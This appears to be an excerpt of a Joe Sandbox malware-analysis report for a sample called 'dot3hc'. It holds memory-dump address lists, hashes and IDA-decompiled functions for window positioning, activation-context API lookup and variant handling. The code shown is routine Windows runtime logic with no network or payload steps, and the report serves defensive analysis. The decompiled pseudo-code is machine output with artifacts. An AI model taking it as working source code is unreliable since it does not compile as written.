                                                      0x004196ed
                                                      0x004196f3
                                                      0x004196f3
                                                      0x004196f7
                                                      0x00000000
                                                      0x004196fd
                                                      0x004196fd
                                                      0x00419704
                                                      0x00419709
                                                      0x0041970b
                                                      0x00000000
                                                      0x0041970d
                                                      0x0041970d
                                                      0x00419710
                                                      0x00419712
                                                      0x00000000
                                                      0x00419714
                                                      0x00419715
                                                      0x00419717
                                                      0x004199d3
                                                      0x004199d3
                                                      0x004199d3
                                                      0x00419712
                                                      0x00000000
                                                      0x0041970b
                                                      0x004196ef
                                                      0x004196ef
                                                      0x004196f1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004196f1
                                                      0x004196e1
                                                      0x004196e1
                                                      0x004196e3
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004196e3
                                                      0x004196a5
                                                      0x004196a5
                                                      0x004196a8
                                                      0x00419758
                                                      0x00419758
                                                      0x0041975b
                                                      0x00419761
                                                      0x00419769
                                                      0x0041976f
                                                      0x00419771
                                                      0x00419774
                                                      0x0041977f
                                                      0x00419784
                                                      0x00419787
                                                      0x00419792
                                                      0x00419797
                                                      0x00419797
                                                      0x00419787
                                                      0x00419774
                                                      0x00419798
                                                      0x004197a1
                                                      0x004197a3
                                                      0x004197a5
                                                      0x004197b9
                                                      0x004197bf
                                                      0x004197c3
                                                      0x004197c5
                                                      0x004197c7
                                                      0x004197d8
                                                      0x004197d8
                                                      0x004197c7
                                                      0x004197dd
                                                      0x004196ae
                                                      0x004196ae
                                                      0x004196b1
                                                      0x004196c4
                                                      0x004196c4
                                                      0x004196c9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004196b3
                                                      0x004196b5
                                                      0x004196bb
                                                      0x004196be
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004196be
                                                      0x004196b1
                                                      0x004196a8
                                                      0x004196a3
                                                      0x004195d6
                                                      0x004195dc
                                                      0x004195de
                                                      0x004195de
                                                      0x004195e2
                                                      0x00000000
                                                      0x00000000
                                                      0x004195ea
                                                      0x004195ef
                                                      0x004195f2
                                                      0x004195ff
                                                      0x00419601
                                                      0x00419603
                                                      0x00000000
                                                      0x00000000
                                                      0x00419603
                                                      0x00000000
                                                      0x004195f2
                                                      0x00419605
                                                      0x00419607
                                                      0x0041962c
                                                      0x0041962c
                                                      0x00419633
                                                      0x00419643
                                                      0x00419643
                                                      0x00419645
                                                      0x00000000
                                                      0x00419647
                                                      0x00419647
                                                      0x0041964a
                                                      0x0041964c
                                                      0x00000000
                                                      0x0041964e
                                                      0x00419651
                                                      0x00419655
                                                      0x00419659
                                                      0x00419664
                                                      0x00419664
                                                      0x00419668
                                                      0x00000000
                                                      0x0041966a
                                                      0x0041966a
                                                      0x00419671
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00419671
                                                      0x0041965b
                                                      0x0041965b
                                                      0x00419662
                                                      0x00419673
                                                      0x00419673
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00419662
                                                      0x00419659
                                                      0x0041964c
                                                      0x00419635
                                                      0x00419635
                                                      0x00419638
                                                      0x00000000
                                                      0x0041963a
                                                      0x0041963a
                                                      0x00419641
                                                      0x0041967a
                                                      0x0041967a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00419641
                                                      0x00419638
                                                      0x00419609
                                                      0x00419609
                                                      0x0041960c
                                                      0x0041960e
                                                      0x00000000
                                                      0x00419610
                                                      0x00419610
                                                      0x00419614
                                                      0x00000000
                                                      0x00419616
                                                      0x00419616
                                                      0x0041961c
                                                      0x0041961f
                                                      0x00419622
                                                      0x00419624
                                                      0x00000000
                                                      0x00419626
                                                      0x00419626
                                                      0x00419626
                                                      0x00419624
                                                      0x00419614
                                                      0x0041960e
                                                      0x00419607
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004195bd
                                                      0x004197e5
                                                      0x00419541
                                                      0x00419541
                                                      0x00419546
                                                      0x00419549
                                                      0x0041954e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041954e
                                                      0x0041951b
                                                      0x0041951b
                                                      0x00419520
                                                      0x00419527
                                                      0x00419522
                                                      0x00419522
                                                      0x00419522
                                                      0x0041952b
                                                      0x00000000
                                                      0x0041952d
                                                      0x00419536
                                                      0x00419550
                                                      0x00419550
                                                      0x00419553
                                                      0x00000000
                                                      0x00419555
                                                      0x00419555
                                                      0x00419558
                                                      0x0041955a
                                                      0x0041955a
                                                      0x0041955d
                                                      0x0041955e
                                                      0x00419564
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00419564
                                                      0x00419538
                                                      0x00419538
                                                      0x00419538
                                                      0x00419568
                                                      0x0041956c
                                                      0x0041956c
                                                      0x00419536
                                                      0x0041952b
                                                      0x00419507
                                                      0x00419507
                                                      0x00419511
                                                      0x00419515
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00419515
                                                      0x00000000
                                                      0x00419505
                                                      0x00419566
                                                      0x00419566
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                      • String ID:
                                                      • API String ID: 656273425-0
                                                      • Opcode ID: d813e09e7dc190e38cece85133ccd490e0a6f1d3d5577f22532c3ba5ccb8d51f
                                                      • Instruction ID: b37fad4d356144a07009b57323d5ed8e9dfbb1bd6742926c0fb4062ff0804fd9
                                                      • Opcode Fuzzy Hash: d813e09e7dc190e38cece85133ccd490e0a6f1d3d5577f22532c3ba5ccb8d51f
                                                      • Instruction Fuzzy Hash: 04F18C31910206EBDF21AF65C8A4BEF7BA5AF44354F14402FE815A72A1DB3C9DC1CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 89%
                                                      			E0040966B(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				intOrPtr _v12;
                                                      				struct tagRECT _v28;
                                                      				struct tagRECT _v44;
                                                      				struct tagRECT _v60;
                                                      				struct tagRECT _v80;
                                                      				char _v100;
                                                      				void* __edi;
                                                      				intOrPtr _t58;
                                                      				struct HWND__* _t59;
                                                      				intOrPtr _t94;
                                                      				signed int _t103;
                                                      				struct HWND__* _t104;
                                                      				void* _t105;
                                                      				struct HWND__* _t107;
                                                      				long _t108;
                                                      				long _t116;
                                                      				void* _t119;
                                                      				struct HWND__* _t121;
                                                      				void* _t123;
                                                      				intOrPtr _t125;
                                                      				intOrPtr _t129;
                                                      
                                                      				_t119 = __edx;
                                                      				_t105 = __ebx;
                                                      				_t125 = __ecx;
                                                      				_v12 = __ecx;
                                                      				_v8 = E0040C981(__ecx);
                                                      				_t58 = _a4;
                                                      				if(_t58 == 0) {
                                                      					if((_v8 & 0x40000000) == 0) {
                                                      						_t59 = GetWindow( *(__ecx + 0x20), 4);
                                                      					} else {
                                                      						_t59 = GetParent( *(__ecx + 0x20));
                                                      					}
                                                      					_t121 = _t59;
                                                      					if(_t121 != 0) {
                                                      						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                                                      						if(_t104 != 0) {
                                                      							_t121 = _t104;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_t4 = _t58 + 0x20; // 0xc033d88b
                                                      					_t121 =  *_t4;
                                                      				}
                                                      				_push(_t105);
                                                      				GetWindowRect( *(_t125 + 0x20),  &_v60);
                                                      				if((_v8 & 0x40000000) != 0) {
                                                      					_t107 = GetParent( *(_t125 + 0x20));
                                                      					GetClientRect(_t107,  &_v28);
                                                      					GetClientRect(_t121,  &_v44);
                                                      					MapWindowPoints(_t121, _t107,  &_v44, 2);
                                                      				} else {
                                                      					if(_t121 != 0) {
                                                      						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                                                      						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                                                      							_t121 = 0;
                                                      						}
                                                      					}
                                                      					_v100 = 0x28;
                                                      					if(_t121 != 0) {
                                                      						GetWindowRect(_t121,  &_v44);
                                                      						E00407923(_t121, E004078B8(_t121, 2),  &_v100);
                                                      						CopyRect( &_v28,  &_v80);
                                                      					} else {
                                                      						_t94 = E00403ED6();
                                                      						if(_t94 != 0) {
                                                      							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                                                      						}
                                                      						E00407923(_t121, E004078B8(_t94, 1),  &_v100);
                                                      						CopyRect( &_v44,  &_v80);
                                                      						CopyRect( &_v28,  &_v80);
                                                      					}
                                                      				}
                                                      				_t108 = _v60.left;
                                                      				asm("cdq");
                                                      				_t123 = _v60.right - _t108;
                                                      				asm("cdq");
                                                      				_t120 = _v44.bottom;
                                                      				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                                                      				_a4 = _v60.bottom - _v60.top;
                                                      				asm("cdq");
                                                      				asm("cdq");
                                                      				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                                                      				if(_t116 >= _v28.left) {
                                                      					if(_t123 + _t116 > _v28.right) {
                                                      						_t116 = _t108 - _v60.right + _v28.right;
                                                      					}
                                                      				} else {
                                                      					_t116 = _v28.left;
                                                      				}
                                                      				if(_t129 >= _v28.top) {
                                                      					if(_a4 + _t129 > _v28.bottom) {
                                                      						_t129 = _v60.top - _v60.bottom + _v28.bottom;
                                                      					}
                                                      				} else {
                                                      					_t129 = _v28.top;
                                                      				}
                                                      				return E0040CC5E(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                                                      			}


























                                                      APIs
                                                        • Part of subcall function 0040C981: GetWindowLongA.USER32 ref: 0040C98C
                                                      • GetParent.USER32(?), ref: 00409698
                                                      • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004096BB
                                                      • GetWindowRect.USER32 ref: 004096D5
                                                      • GetWindowLongA.USER32 ref: 004096EB
                                                      • CopyRect.USER32 ref: 00409738
                                                      • CopyRect.USER32 ref: 00409742
                                                      • GetWindowRect.USER32 ref: 0040974B
                                                      • CopyRect.USER32 ref: 00409767
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                      • String ID: (
                                                      • API String ID: 808654186-3887548279
                                                      • Opcode ID: 5d1e3bc64e2e58d11ae7be82a3f6d108471c0fca343710d55e82952801911053
                                                      • Instruction ID: bc6882baaa5189169e0c0b7d53e15d52d0ad1cceba646d15ad8487012d1c9b7f
                                                      • Opcode Fuzzy Hash: 5d1e3bc64e2e58d11ae7be82a3f6d108471c0fca343710d55e82952801911053
                                                      • Instruction Fuzzy Hash: 39513072910219ABDB00DFA8CD85EEEBBB9AF88314F154136F905F3291D734AD41CB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040D31B(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a100) {
                                                      				void* _v8;
                                                      				void* _v20;
                                                      				void* _t16;
                                                      
                                                      				_t16 = __ecx;
                                                      				_a100 = _a100 + __edx;
                                                      			}






                                                      0x0040d31b
                                                      0x0040d320

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(KERNEL32), ref: 0040D328
                                                      • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0040D349
                                                      • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0040D35B
                                                      • GetProcAddress.KERNEL32(ActivateActCtx), ref: 0040D36D
                                                      • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0040D37F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: $dD$ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                      • API String ID: 667068680-1206286444
                                                      • Opcode ID: 111313579755d19612b2a0bed931782684332447845d063b7bc1235d8c339b6f
                                                      • Instruction ID: 8662d49a9f014bf3ccbdae78ec47047f6782647d52dd8aec524ec0572c096a73
                                                      • Opcode Fuzzy Hash: 111313579755d19612b2a0bed931782684332447845d063b7bc1235d8c339b6f
                                                      • Instruction Fuzzy Hash: EDF0F8B8945320AFCF109F71BD09A897EE8E60F7917225077A400A3266D67991008E9F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 65%
                                                      			E0041BDF7(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				CHAR* _t121;
                                                      				CHAR* _t127;
                                                      				CHAR* _t135;
                                                      				CHAR* _t140;
                                                      				signed short* _t142;
                                                      				CHAR* _t144;
                                                      				CHAR* _t148;
                                                      				CHAR* _t151;
                                                      				signed int _t158;
                                                      				signed int _t169;
                                                      				CHAR* _t173;
                                                      				void* _t176;
                                                      				void* _t179;
                                                      				signed short _t181;
                                                      				signed int _t183;
                                                      				intOrPtr _t185;
                                                      				CHAR* _t188;
                                                      				int _t190;
                                                      				char* _t193;
                                                      				void* _t194;
                                                      				void* _t195;
                                                      				CHAR* _t196;
                                                      				char* _t198;
                                                      				void* _t199;
                                                      				long long _t204;
                                                      
                                                      				_t199 = __eflags;
                                                      				_t185 = __edx;
                                                      				_push(0x50);
                                                      				E0041F789(E00433621, __ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
                                                      				E0040DBE0(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
                                                      				_t173 =  *(_t195 + 8);
                                                      				_t121 = _t173[8];
                                                      				_t187 = 0;
                                                      				 *(_t195 - 4) = 0;
                                                      				 *(_t195 - 0x1d) = 0;
                                                      				 *(_t195 - 0x18) = _t121;
                                                      				if(_t121 == 0) {
                                                      					 *(_t195 - 0x18) = _t195 - 0x1d;
                                                      				}
                                                      				_t190 = lstrlenA( *(_t195 - 0x18));
                                                      				 *(_t195 - 0x28) = _t173[0x10];
                                                      				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
                                                      				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
                                                      					L11:
                                                      					_t191 =  *(_t195 + 0x14);
                                                      					_t127 = E00401060(_t185,  *(_t191 + 8) << 4);
                                                      					__eflags = _t127;
                                                      					_pop(_t176);
                                                      					if(_t127 != 0) {
                                                      						_t191 =  *(_t191 + 8);
                                                      						__eflags = _t191 - 0x7ffffff;
                                                      						if(_t191 > 0x7ffffff) {
                                                      							goto L12;
                                                      						}
                                                      						_t192 = _t191 << 4;
                                                      						E0041E5F0(_t191 << 4);
                                                      						 *(_t195 - 0x10) = _t196;
                                                      						 *(_t195 - 0x1c) = _t196;
                                                      						E0041F330(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
                                                      						_t198 =  &(_t196[0xc]);
                                                      						_t187 = E0041B5F0(_t176, _t187, _t192,  *(_t195 - 0x18),  *(_t195 - 0x24));
                                                      						_t49 = _t187 + 0x10; // 0x10
                                                      						_t191 = _t49;
                                                      						_t135 = E00401060(_t185, _t49);
                                                      						__eflags = _t135;
                                                      						if(_t135 == 0) {
                                                      							L4:
                                                      							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                      							if( *(_t195 - 0x2c) == 0) {
                                                      								L7:
                                                      								L55:
                                                      								return E0041F7E5(_t173, _t187, _t191);
                                                      							}
                                                      							_push( *((intOrPtr*)(_t195 - 0x30)));
                                                      							_push(0);
                                                      							L6:
                                                      							E0040D3B7();
                                                      							goto L7;
                                                      						}
                                                      						E0041E5F0(_t191);
                                                      						 *(_t195 - 0x10) = _t198;
                                                      						_t173 = 0;
                                                      						_t193 = _t198;
                                                      						 *((intOrPtr*)(_t195 - 0x58)) = 0x437058;
                                                      						 *((intOrPtr*)(_t195 - 0x54)) = 0;
                                                      						 *((intOrPtr*)(_t195 - 0x48)) = 0;
                                                      						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
                                                      						 *((intOrPtr*)(_t195 - 0x50)) = 0;
                                                      						_t57 = _t195 - 0x58; // 0x437058
                                                      						_push( *(_t195 - 0x1c));
                                                      						_push( *((intOrPtr*)(_t195 + 0x18)));
                                                      						 *(_t195 - 4) = 1;
                                                      						_push( *(_t195 + 0x14));
                                                      						_push( *(_t195 - 0x24));
                                                      						_push(_t195 - 0x44);
                                                      						_push( *(_t195 - 0x18));
                                                      						_push(_t193);
                                                      						_t140 = E0041BB0F(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
                                                      						__eflags = _t140;
                                                      						 *(_t195 - 0x18) = _t140;
                                                      						if(_t140 != 0) {
                                                      							L26:
                                                      							_t191 =  *(_t195 + 0x14);
                                                      							_t187 = 0;
                                                      							__eflags =  *(_t191 + 8);
                                                      							if( *(_t191 + 8) <= 0) {
                                                      								L29:
                                                      								__eflags =  *(_t195 - 0x18);
                                                      								_t85 = _t195 - 0x58; // 0x437058
                                                      								_t179 = _t85;
                                                      								if( *(_t195 - 0x18) == 0) {
                                                      									E0041B9A1(_t179);
                                                      									_t142 =  *(_t195 + 0x10);
                                                      									__eflags = _t142;
                                                      									if(_t142 == 0) {
                                                      										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
                                                      										__eflags = _t144;
                                                      										if(_t144 == 0) {
                                                      											__imp__#6(_t173);
                                                      											L52:
                                                      											 *(_t195 - 4) = 0;
                                                      											E0041B9F7(_t195 - 0x58);
                                                      											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                      											__eflags =  *(_t195 - 0x2c);
                                                      											if( *(_t195 - 0x2c) != 0) {
                                                      												_push( *((intOrPtr*)(_t195 - 0x30)));
                                                      												_push(0);
                                                      												E0040D3B7();
                                                      											}
                                                      											__eflags = 0;
                                                      											goto L55;
                                                      										}
                                                      										_t148 = _t144 - 1;
                                                      										__eflags = _t148;
                                                      										if(_t148 == 0) {
                                                      											L48:
                                                      											__eflags = _t173;
                                                      											if(_t173 != 0) {
                                                      												 *((intOrPtr*)( *_t173 + 8))(_t173);
                                                      											}
                                                      											goto L52;
                                                      										}
                                                      										_t151 = _t148 - 3;
                                                      										__eflags = _t151;
                                                      										if(_t151 == 0) {
                                                      											__imp__#9(_t195 - 0x44);
                                                      											goto L52;
                                                      										}
                                                      										__eflags = _t151 != 1;
                                                      										if(_t151 != 1) {
                                                      											goto L52;
                                                      										}
                                                      										goto L48;
                                                      									}
                                                      									_t181 =  *(_t195 - 0x24);
                                                      									 *_t142 = _t181;
                                                      									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
                                                      									__eflags = _t183 - 0x13;
                                                      									if(_t183 > 0x13) {
                                                      										goto L52;
                                                      									}
                                                      									switch( *((intOrPtr*)(_t183 * 4 +  &M0041C107))) {
                                                      										case 0:
                                                      											L41:
                                                      											 *(__eax + 8) = __bx;
                                                      											goto L52;
                                                      										case 1:
                                                      											 *(__eax + 8) = __ebx;
                                                      											goto L52;
                                                      										case 2:
                                                      											 *(__eax + 8) =  *(__ebp - 0x44);
                                                      											goto L52;
                                                      										case 3:
                                                      											 *(__eax + 8) =  *(__ebp - 0x44);
                                                      											goto L52;
                                                      										case 4:
                                                      											__ecx =  *(__ebp - 0x44);
                                                      											 *(__eax + 8) =  *(__ebp - 0x44);
                                                      											__ecx =  *(__ebp - 0x40);
                                                      											 *(__eax + 0xc) = __ecx;
                                                      											goto L52;
                                                      										case 5:
                                                      											__bx =  ~__bx;
                                                      											asm("sbb ebx, ebx");
                                                      											goto L41;
                                                      										case 6:
                                                      											__esi = __ebp - 0x44;
                                                      											__edi = __eax;
                                                      											asm("movsd");
                                                      											asm("movsd");
                                                      											asm("movsd");
                                                      											asm("movsd");
                                                      											goto L52;
                                                      										case 7:
                                                      											goto L52;
                                                      										case 8:
                                                      											_t142[4] = _t173;
                                                      											goto L52;
                                                      									}
                                                      								}
                                                      								 *(_t195 - 4) = 0;
                                                      								E0041B9F7(_t179);
                                                      								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                      								__eflags =  *(_t195 - 0x2c);
                                                      								if( *(_t195 - 0x2c) != 0) {
                                                      									_push( *((intOrPtr*)(_t195 - 0x30)));
                                                      									_push(0);
                                                      									E0040D3B7();
                                                      								}
                                                      								goto L55;
                                                      							}
                                                      							do {
                                                      								__imp__#9( *(_t195 - 0x1c));
                                                      								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
                                                      								_t187 = _t187 + 1;
                                                      								__eflags = _t187 -  *(_t191 + 8);
                                                      							} while (_t187 <  *(_t191 + 8));
                                                      							goto L29;
                                                      						}
                                                      						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
                                                      						__eflags = _t158 - 4;
                                                      						_push(_t187);
                                                      						_push(_t193);
                                                      						_push( *(_t195 - 0x28));
                                                      						 *(_t195 - 4) = 2;
                                                      						if(_t158 == 4) {
                                                      							E0041D49C();
                                                      							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
                                                      							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
                                                      							L25:
                                                      							 *(_t195 - 4) = 1;
                                                      							goto L26;
                                                      						}
                                                      						__eflags = _t158 - 5;
                                                      						if(_t158 == 5) {
                                                      							L23:
                                                      							E0041D49C();
                                                      							 *((long long*)(_t195 - 0x44)) = _t204;
                                                      							goto L25;
                                                      						}
                                                      						__eflags = _t158 - 7;
                                                      						if(_t158 == 7) {
                                                      							goto L23;
                                                      						}
                                                      						__eflags = _t158 + 0xffffffec - 1;
                                                      						if(_t158 + 0xffffffec > 1) {
                                                      							_t173 = E0041D49C();
                                                      						} else {
                                                      							 *((intOrPtr*)(_t195 - 0x44)) = E0041D49C();
                                                      							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
                                                      						}
                                                      						goto L25;
                                                      					}
                                                      					L12:
                                                      					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                      					__eflags =  *(_t195 - 0x2c) - _t187;
                                                      					if( *(_t195 - 0x2c) == _t187) {
                                                      						goto L7;
                                                      					}
                                                      					_push( *((intOrPtr*)(_t195 - 0x30)));
                                                      					_push(_t187);
                                                      					goto L6;
                                                      				}
                                                      				_t19 = _t190 + 3; // 0x3
                                                      				_t187 = _t19;
                                                      				if(E00401060(_t185, _t19) != 0) {
                                                      					E0041E5F0(_t187);
                                                      					 *(_t195 - 0x10) = _t196;
                                                      					_t188 = _t196;
                                                      					_t26 = _t190 + 3; // 0x3
                                                      					E00402FAA(_t188, _t190, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
                                                      					_t169 = _t173[0xc] & 0x0000ffff;
                                                      					_t196 =  &(_t196[0x10]);
                                                      					__eflags = _t169 - 8;
                                                      					 *(_t195 - 0x18) = _t188;
                                                      					if(_t169 == 8) {
                                                      						_t169 = 0xe;
                                                      					}
                                                      					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
                                                      					_t188[_t190] = 0xff;
                                                      					_t194 = _t190 + 1;
                                                      					_t188[_t194] = _t169;
                                                      					_t188[_t194 + 1] = 0;
                                                      					 *(_t195 - 0x28) = _t173[0x14];
                                                      					_t187 = 0;
                                                      					__eflags = 0;
                                                      					goto L11;
                                                      				}
                                                      				goto L4;
                                                      			}





























                                                      APIs
                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 0041BDFE
                                                      • lstrlenA.KERNEL32(00000000,000000FF,00000050,00410F22,00000000,00000001,?,?,000000FF,?,?,?), ref: 0041BE30
                                                      • __alloca_probe_16.LIBCMT ref: 0041BE79
                                                        • Part of subcall function 00402FAA: _memcpy_s.LIBCMT ref: 00402FBA
                                                      • __alloca_probe_16.LIBCMT ref: 0041BEF0
                                                      • _memset.LIBCMT ref: 0041BF00
                                                      • __alloca_probe_16.LIBCMT ref: 0041BF29
                                                      • VariantClear.OLEAUT32(?), ref: 0041BFDF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: __alloca_probe_16$ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                      • String ID: XpC
                                                      • API String ID: 2586305615-1560596422
                                                      • Opcode ID: 52af632938839ca9de9910269fe1a11465be98ac3f60d486fab5c827e1cec40d
                                                      • Instruction ID: fa49f027109238ab1e2c7d572b865a3b51314bf543938ae7db15aad6909c8791
                                                      • Opcode Fuzzy Hash: 52af632938839ca9de9910269fe1a11465be98ac3f60d486fab5c827e1cec40d
                                                      • Instruction Fuzzy Hash: EFA19B70800209DBCF11DFE9C885AEEBFB1FF08314F24815AE515B7291D7399A86DB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00403901(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __ebp;
                                                      				_Unknown_base(*)()* _t9;
                                                      				struct HINSTANCE__* _t15;
                                                      				void* _t16;
                                                      				intOrPtr* _t18;
                                                      				char _t19;
                                                      				intOrPtr _t21;
                                                      				_Unknown_base(*)()* _t22;
                                                      				_Unknown_base(*)()* _t23;
                                                      
                                                      				_t16 = __esi;
                                                      				_t12 = __ecx;
                                                      				_t18 = __ecx;
                                                      				 *__ecx = _a4;
                                                      				_a4 = 0;
                                                      				_t19 =  *0x444a68; // 0x1
                                                      				if(_t19 == 0) {
                                                      					_t15 = GetModuleHandleA("KERNEL32");
                                                      					_t20 = _t15;
                                                      					if(_t15 == 0) {
                                                      						L2:
                                                      						E004037E3(0, _t12, _t15, _t16, _t20);
                                                      					}
                                                      					 *0x444a58 = GetProcAddress(_t15, "CreateActCtxA");
                                                      					 *0x444a5c = GetProcAddress(_t15, "ReleaseActCtx");
                                                      					 *0x444a60 = GetProcAddress(_t15, "ActivateActCtx");
                                                      					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
                                                      					_t21 =  *0x444a58; // 0x747be4f0
                                                      					 *0x444a64 = _t9;
                                                      					_t16 = _t16;
                                                      					if(_t21 == 0) {
                                                      						__eflags =  *0x444a5c; // 0x74787540
                                                      						if(__eflags != 0) {
                                                      							goto L2;
                                                      						} else {
                                                      							__eflags =  *0x444a60; // 0x74787510
                                                      							if(__eflags != 0) {
                                                      								goto L2;
                                                      							} else {
                                                      								__eflags = _t9;
                                                      								if(__eflags != 0) {
                                                      									goto L2;
                                                      								}
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_t22 =  *0x444a5c; // 0x74787540
                                                      						if(_t22 == 0) {
                                                      							goto L2;
                                                      						} else {
                                                      							_t23 =  *0x444a60; // 0x74787510
                                                      							if(_t23 == 0) {
                                                      								goto L2;
                                                      							} else {
                                                      								_t20 = _t9;
                                                      								if(_t9 == 0) {
                                                      									goto L2;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					 *0x444a68 = 1;
                                                      				}
                                                      				return _t18;
                                                      			}















